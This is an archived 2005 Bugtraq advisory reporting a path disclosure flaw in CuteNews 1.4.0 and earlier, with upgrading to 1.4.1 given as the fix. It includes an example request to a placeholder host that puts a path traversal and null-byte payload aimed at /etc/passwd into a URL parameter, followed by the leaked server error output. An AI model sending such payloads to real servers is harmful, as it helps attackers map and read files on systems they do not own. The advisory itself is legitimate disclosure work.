| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <36013.213.140.231.61.1131355430.squirrel@standarthost.ru> Date: Mon, 7 Nov 2005 12:23:50 +0300 (MSK) From: poizon@...urityinfo.ru To: bugtraq@...urityfocus.com Subject: Path disclosure in CuteNews <= 1.4.0 A remote user can supply a specially crafted URL to cause the system to display an error message that discloses the installation path and other data. Bug exists in "index.php". Example: http://victim.com/index.php?subaction=showfull &id=1128227686&archive=../../../../../../etc/passwd%00&start_from=&ucat=1& Error: Warning: file(/storage/bg/myst/www/irc/cutenews/data/archives/../../../../../../../../../etc/passwd\0.news.arch): failed to open stream: No such file or directory in /storage/bg/myst/www/irc/cutenews/inc/shows.inc.php on line 268 Warning: Invalid argument supplied for foreach() in /storage/bg/myst/www/irc/cutenews/inc/shows.inc.php on line 270 Can not find an article with id: 1128227686 ------------------------------------------------------------------- Solution: Upgrade version 1.4.1 ------------------------------------------- Original advisory: http://www.securityinfo.ru/2005/11/____cutenews_140.html **************************** http://www.securityinfo.ru
Powered by blists - more mailing lists